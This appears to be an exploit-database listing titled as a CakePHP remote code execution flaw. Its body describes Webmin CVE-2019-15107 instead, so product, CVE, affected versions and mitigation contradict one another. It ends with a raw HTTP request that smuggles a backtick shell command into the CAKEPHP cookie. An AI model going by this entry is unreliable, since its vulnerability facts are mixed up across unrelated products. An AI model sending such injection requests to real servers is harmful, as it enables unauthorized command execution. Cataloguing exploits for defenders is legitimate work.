header-logo
Suggest Exploit
vendor:
CakePHP
by:
Gjoko Krstic
9,8
CVSS
CRITICAL
Remote Code Execution
78
CWE
Product Name: CakePHP
Affected Version From: 3.7.12
Affected Version To: 3.9.1
Patch Exists: YES
Related CWE: CVE-2019-15107
CPE: a:cakephp:cakephp
Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2019-15107/https://www.rapid7.com/db/vulnerabilities/http-webmin-cve-2019-15107/
Other Scripts: N/A
Tags: packetstorm,cve,cve2019,webmin,rce,kev,edb
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.htmlhttps://nvd.nist.gov/vuln/detail/CVE-2019-15107https://www.exploit-db.com/exploits/47230http://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/154485/Webmin-1.920-Remote-Code-Execution.html
Nuclei Metadata: {'max-request': 1, 'vendor': 'webmin', 'product': 'webmin'}
Platforms Tested: None
2019

CakePHP Remote Code Execution Vulnerability

Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.

Mitigation:

Upgrade to CakePHP version 3.7.13, 3.8.11, or 3.9.2.
Source

Exploit-DB raw data:

POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1
Host: 10.242.129.149
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/
Cookie: CAKEPHP=`sleep 10`
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

action=logout

Navigation

Suggest Exploit

Services By CQR